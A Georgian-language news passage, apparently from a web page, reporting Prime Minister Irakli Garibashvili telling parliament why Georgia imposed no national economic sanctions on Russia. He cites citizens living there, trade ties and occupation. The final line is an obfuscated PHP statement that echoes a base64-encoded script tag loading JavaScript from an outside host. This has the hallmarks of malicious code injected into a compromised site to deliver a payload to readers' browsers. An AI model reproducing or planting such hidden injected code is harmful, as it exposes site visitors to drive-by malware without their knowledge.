celsiusi
ავერსი საქკაბელი
საქართველოს პრემიერ-მინისტრმა, პარლამენტში ოპოზიციის კითხვებს უპასუხა. ერთ-ერთი საკითხი, რუსეთისთვის სანქციების დაწესება იყო. როგორც ირაკლი ღარიბაშვილმა ოპოზიციის საპასუხოდ განაცხადა,  რუსეთის ფედერაციის მიმართ ეკონომიკური სანქციების დაწესებან იშნავდა იმას, რომ ჩვენ საკუთარ მოქალაქეებს და  ქვეყანას დავუწესებდით სანქციებს:
 
"2 თვის განმავლობაში გიხსნიდით და დეტალურ ინფორმაციას მივაწვდიდით საზოგადოებას, მაგრამ ერთი არის, როდესაც ადამიანს არ სურს იმის გაგება თუ რას აკეთებს ხელისუფლება. მე ვფიქრობ, რომ ამ მოხსენების შემდეგ, თუ ადამიანი არ არის განწყობილი კონფლიქტისთვის და რაღაც საფუძველ გარეშე ბარლდებებისა და ცილისწამების გაგრძელება არ სურს, მე უბრალოდ მრჩება კითხვა - რა უნდა გაეკეთებინა დამატებით მთავრობას ამ ყველაფრის შემდეგ, რაც ჩვენ გავაკეთეთ. ჩვენ ყველგან მხარი დავუჭირეთ უკრაინის მხარდამჭერ რეზოლუციებს. მაგრამ მინდა კიდევ ერთხელ განვმარტო, რომ საქართველომ არ დაუწესა ეროვნული ეკონომიკური სანქციები რუსეთს, ერთადერთი სწორი მიზეზით - ეს არის ჩვენი ეროვნული ინტერესებიდან ნაკარნახევი. ჩვენ არ გავაკეთებთ ისეთს არაფერს, რაც ჩვენს ეროვნულ ინტერესებს შეეწინააღმდეგება. 
 
მე მინდა გკითხოთ ზოგადად, თქვენ რომ გვიკიჟინებთ და მოგვიწოდებთ, რომ დაუწესეთ ეკონომიკურ-ფინანსური სანქციები რუსეთს, თქვენ თუ გაქვთ წარმოდგენა საერთოდ, ერთი მილიონი ჩვენი მოქალაქე ცხოვრობს რუსეთში, გვაქვს სავაჭრო ეკონომიკური ურთიერთობები, ჩვენი ქვეყანა დროებით ოკუპირებულია და რუსული ჯარი დგას ჩვენს ტერიტორიებზე, ამ ფონზე, მით უმეტეს, თქვენ კარგად მოგეხსენებათ, სანქციების დაწესება ეროვნულ დონეზე, ეროვნული, ეკონომიკური სანქციების დაწესება რუსეთის ფედერაციაზე რა თქმა უნდა ნიშნავდა იმას, რომ ჩვენ საკუთარ მოქალაქეებს დავუწესებდით სანქციებს და ჩვენ ქვეყანას დავუწესებდით სანქციებს.
 
2 თვის წინ, ჩვენ ეს სისულელე რომ გაგვკეთებიან და თქვენთვის დაგვეჯერებინა, ჩვენ დაგვეწესებინა ეროვნული დონის სანქციები რუსეთისთვის, რა მდგომარეობაში ვიქნებოდით დღეს ჩვენ, თქვენ თუ გაქვთ ამაზე წარმოდგენა და თუ გაქვთ პასუხი, მოქალაქეებს რომ გასცეთ," - განაცხადა პრემიერმა. 
654
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");